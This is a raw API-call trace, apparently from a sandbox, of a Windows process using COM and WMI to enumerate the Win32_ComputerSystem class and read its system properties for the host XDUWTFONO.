	[0200.210] CoTaskMemFree (pv=0x1b81e650) 
	[0200.210] IUnknown:QueryInterface (in: This=0x1c83c8b8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c8d0 | out: ppvObject=0x1c80c8d0*=0x1b807cb0) returned 0x0
	[0200.210] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c950 | out: ppvObject=0x1c80c950*=0x0) returned 0x80004002
	[0200.211] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c6e8 | out: ppvObject=0x1c80c6e8*=0x0) returned 0x80004002
	[0200.211] WbemLocator:IUnknown:AddRef (This=0x1b807cb0) returned 0x3
	[0200.211] CoGetContextToken (in: pToken=0x1c80c5a0 | out: pToken=0x1c80c5a0) returned 0x0
	[0200.211] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c560 | out: ppvObject=0x1c80c560*=0x1b807b98) returned 0x0
	[0200.212] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807b98, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c590 | out: pCid=0x1c80c590*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.212] WbemLocator:IUnknown:Release (This=0x1b807b98) returned 0x3
	[0200.212] CoGetContextToken (in: pToken=0x1c80c570 | out: pToken=0x1c80c570) returned 0x0
	[0200.212] WbemLocator:IUnknown:AddRef (This=0x1b807cb0) returned 0x4
	[0200.212] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c688 | out: ppvObject=0x1c80c688*=0x1b807c80) returned 0x0
	[0200.212] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x4
	[0200.212] WbemLocator:IRpcOptions:Query (in: This=0x1b807c80, pPrx=0x1b807cb0, dwProperty=2, pdwValue=0x1c80c6f8 | out: pdwValue=0x1c80c6f8) returned 0x80004002
	[0200.212] WbemLocator:IUnknown:Release (This=0x1b807c80) returned 0x3
	[0200.213] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x2
	[0200.213] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0200.213] CoGetContextToken (in: pToken=0x1c80c9b0 | out: pToken=0x1c80c9b0) returned 0x0
	[0200.213] WbemLocator:IUnknown:AddRef (This=0x1b807cb0) returned 0x3
	[0200.213] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x1c80caf0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cad0 | out: ppvObject=0x1c80cad0*=0x1c83c8b8) returned 0x0
	[0200.213] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x3
	[0200.213] IUnknown:Release (This=0x1c83c8b8) returned 0x2
	[0200.213] IUnknown:Release (This=0x1c83c8b8) returned 0x1
	[0200.213] IUnknown:Release (This=0x1c83c728) returned 0x2
	[0200.214] CoGetContextToken (in: pToken=0x1c80ce70 | out: pToken=0x1c80ce70) returned 0x0
	[0200.214] CoGetContextToken (in: pToken=0x1c80cdb0 | out: pToken=0x1c80cdb0) returned 0x0
	[0200.214] WbemLocator:IUnknown:AddRef (This=0x1b807cb0) returned 0x2
	[0200.214] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x1c80cef0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ced0 | out: ppvObject=0x1c80ced0*=0x1c83c8b8) returned 0x0
	[0200.214] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x2
	[0200.214] IUnknown:AddRef (This=0x1c83c8b8) returned 0x3
	[0200.214] IEnumWbemClassObject:Reset (This=0x1c83c8b8) returned 0x0
	[0200.215] IUnknown:Release (This=0x1c83c8b8) returned 0x2
	[0200.215] CoTaskMemAlloc (cb=0x8) returned 0x1b804e10
	[0200.215] IEnumWbemClassObject:Next (in: This=0x1c83c8b8, lTimeout=-1, uCount=0x1, apObjects=0x1b804e10, puReturned=0x1c80d0f8 | out: apObjects=0x1b804e10*=0x1c83c960, puReturned=0x1c80d0f8*=0x1) returned 0x0
	[0200.217] IUnknown:QueryInterface (in: This=0x1c83c960, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c420 | out: ppvObject=0x1c80c420*=0x1c83c960) returned 0x0
	[0200.217] IUnknown:QueryInterface (in: This=0x1c83c960, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c4a0 | out: ppvObject=0x1c80c4a0*=0x0) returned 0x80004002
	[0200.218] IUnknown:QueryInterface (in: This=0x1c83c960, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c238 | out: ppvObject=0x1c80c238*=0x0) returned 0x80004002
	[0200.218] IUnknown:AddRef (This=0x1c83c960) returned 0x3
	[0200.218] CoGetContextToken (in: pToken=0x1c80c0f0 | out: pToken=0x1c80c0f0) returned 0x0
	[0200.218] IUnknown:QueryInterface (in: This=0x1c83c960, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c0b0 | out: ppvObject=0x1c80c0b0*=0x1c83c968) returned 0x0
	[0200.218] IMarshal:GetUnmarshalClass (in: This=0x1c83c968, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c0e0 | out: pCid=0x1c80c0e0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0200.219] IUnknown:Release (This=0x1c83c968) returned 0x3
	[0200.219] CoGetContextToken (in: pToken=0x1c80c0c0 | out: pToken=0x1c80c0c0) returned 0x0
	[0200.219] IUnknown:AddRef (This=0x1c83c960) returned 0x4
	[0200.219] IUnknown:QueryInterface (in: This=0x1c83c960, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c1d8 | out: ppvObject=0x1c80c1d8*=0x0) returned 0x80004002
	[0200.219] IUnknown:Release (This=0x1c83c960) returned 0x3
	[0200.219] IUnknown:Release (This=0x1c83c960) returned 0x2
	[0200.219] CoGetContextToken (in: pToken=0x1c80c580 | out: pToken=0x1c80c580) returned 0x0
	[0200.219] CoGetContextToken (in: pToken=0x1c80c4c0 | out: pToken=0x1c80c4c0) returned 0x0
	[0200.219] IUnknown:AddRef (This=0x1c83c960) returned 0x3
	[0200.219] IUnknown:QueryInterface (in: This=0x1c83c960, riid=0x1c80c600*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80c5e0 | out: ppvObject=0x1c80c5e0*=0x1c83c960) returned 0x0
	[0200.220] IUnknown:Release (This=0x1c83c960) returned 0x3
	[0200.220] IUnknown:Release (This=0x1c83c960) returned 0x2
	[0200.220] IUnknown:Release (This=0x1c83c960) returned 0x1
	[0200.220] CoTaskMemFree (pv=0x1b804e10) 
	[0200.220] CoGetContextToken (in: pToken=0x1c80cf00 | out: pToken=0x1c80cf00) returned 0x0
	[0200.220] IUnknown:AddRef (This=0x1c83c960) returned 0x2
	[0200.220] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__GENUS", lFlags=0, pVal=0x1c80d070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d06c*=0, plFlavor=0x1c80d068*=0 | out: pVal=0x1c80d070*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d06c*=3, plFlavor=0x1c80d068*=64) returned 0x0
	[0200.221] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__PATH", lFlags=0, pVal=0x1c80d010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d00c*=0, plFlavor=0x1c80d008*=0 | out: pVal=0x1c80d010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d00c*=8, plFlavor=0x1c80d008*=64) returned 0x0
	[0200.221] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0200.221] CoGetObjectContext (in: riid=0x1c80cfa8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfa0 | out: ppv=0x1c80cfa0*=0x181868) returned 0x0
	[0200.221] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfc0 | out: pAptType=0x1c80cfc0*=1) returned 0x0
	[0200.221] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0c8 | out: ppvObject=0x1c80d0c8*=0x0) returned 0x80004002
	[0200.221] IUnknown:Release (This=0x181868) returned 0x1
	[0200.222] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c630 | out: ppv=0x1c80c630*=0x1c831a60) returned 0x0
	[0200.222] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c831a60, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c340 | out: ppvObject=0x1c80c340*=0x0) returned 0x80004002
	[0200.222] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c831a60, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c328 | out: ppvObject=0x1c80c328*=0x1c835ae0) returned 0x0
	[0200.222] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ae0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c230 | out: ppvObject=0x1c80c230*=0x1c835ae0) returned 0x0
	[0200.223] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ae0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c2b0 | out: ppvObject=0x1c80c2b0*=0x0) returned 0x80004002
	[0200.223] WbemDefPath:IUnknown:AddRef (This=0x1c835ae0) returned 0x3
	[0200.223] CoGetContextToken (in: pToken=0x1c80bf00 | out: pToken=0x1c80bf00) returned 0x0
	[0200.223] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ae0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bec0 | out: ppvObject=0x1c80bec0*=0x1b81f9b0) returned 0x0
	[0200.223] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b81f9b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bef0 | out: pCid=0x1c80bef0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.224] WbemDefPath:IUnknown:Release (This=0x1b81f9b0) returned 0x3
	[0200.224] CoGetContextToken (in: pToken=0x1c80bed0 | out: pToken=0x1c80bed0) returned 0x0
	[0200.224] WbemDefPath:IUnknown:AddRef (This=0x1c835ae0) returned 0x4
	[0200.224] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ae0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bfe8 | out: ppvObject=0x1c80bfe8*=0x0) returned 0x80004002
	[0200.224] WbemDefPath:IUnknown:Release (This=0x1c835ae0) returned 0x3
	[0200.224] WbemDefPath:IUnknown:Release (This=0x1c835ae0) returned 0x2
	[0200.224] WbemDefPath:IUnknown:Release (This=0x1c831a60) returned 0x0
	[0200.225] WbemDefPath:IUnknown:Release (This=0x1c835ae0) returned 0x1
	[0200.225] CoGetContextToken (in: pToken=0x1c80cc00 | out: pToken=0x1c80cc00) returned 0x0
	[0200.225] CoGetContextToken (in: pToken=0x1c80cb40 | out: pToken=0x1c80cb40) returned 0x0
	[0200.225] WbemDefPath:IUnknown:AddRef (This=0x1c835ae0) returned 0x2
	[0200.225] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ae0, riid=0x1c80cc80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cc60 | out: ppvObject=0x1c80cc60*=0x1c835ae0) returned 0x0
	[0200.225] WbemDefPath:IUnknown:Release (This=0x1c835ae0) returned 0x2
	[0200.225] WbemDefPath:IUnknown:Release (This=0x1c835ae0) returned 0x1
	[0200.225] CoGetContextToken (in: pToken=0x1c80cd80 | out: pToken=0x1c80cd80) returned 0x0
	[0200.225] CoGetContextToken (in: pToken=0x1c80ccc0 | out: pToken=0x1c80ccc0) returned 0x0
	[0200.225] WbemDefPath:IUnknown:AddRef (This=0x1c835ae0) returned 0x2
	[0200.225] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ae0, riid=0x1c80ce00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cde0 | out: ppvObject=0x1c80cde0*=0x1c835ae0) returned 0x0
	[0200.226] WbemDefPath:IUnknown:Release (This=0x1c835ae0) returned 0x2
	[0200.226] WbemDefPath:IUnknown:AddRef (This=0x1c835ae0) returned 0x3
	[0200.226] WbemDefPath:IWbemPath:SetText (This=0x1c835ae0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0200.226] WbemDefPath:IUnknown:Release (This=0x1c835ae0) returned 0x2
	[0200.226] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80d040 | out: puCount=0x1c80d040*=0x2) returned 0x0
	[0200.226] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d040*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d040*=0x17, pszText=0x0) returned 0x0
	[0200.226] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d040*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d040*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.226] CoTaskMemAlloc (cb=0x8) returned 0x1b804e10
	[0200.226] IEnumWbemClassObject:Next (in: This=0x1c83c8b8, lTimeout=-1, uCount=0x1, apObjects=0x1b804e10, puReturned=0x1c80d0f8 | out: apObjects=0x1b804e10*=0x0, puReturned=0x1c80d0f8*=0x0) returned 0x1
	[0200.370] CoTaskMemFree (pv=0x1b804e10) 
	[0200.371] CoGetContextToken (in: pToken=0x1c80ce80 | out: pToken=0x1c80ce80) returned 0x0
	[0200.371] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x1
	[0200.371] IUnknown:Release (This=0x1c83c8b8) returned 0x0
	[0200.513] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0200.513] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0200.513] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.513] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0200.513] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0200.514] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0200.514] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0200.514] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0200.514] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0200.514] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.514] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__CLASS", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0200.514] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.515] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__CLASS", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0200.515] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.515] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0200.515] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0200.516] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.516] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0200.516] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0200.516] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.516] IWbemClassObject:GetNames (in: This=0x1c83c960, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c80d128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c80d120 | out: pNames=0x1c80d120*="\x01ƀ\x08") returned 0x0
	[0200.516] SafeArrayGetDim (psa=0x1b814410) returned 0x1
	[0200.517] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__GENUS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0200.517] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__CLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0200.517] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.517] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0200.518] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__DYNASTY", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0200.518] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.518] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__RELPATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0200.518] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0200.518] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0200.519] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__DERIVATION", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b814410*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b804e00, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c80d11c*=8200, plFlavor=0x1c80d118*=64) returned 0x0
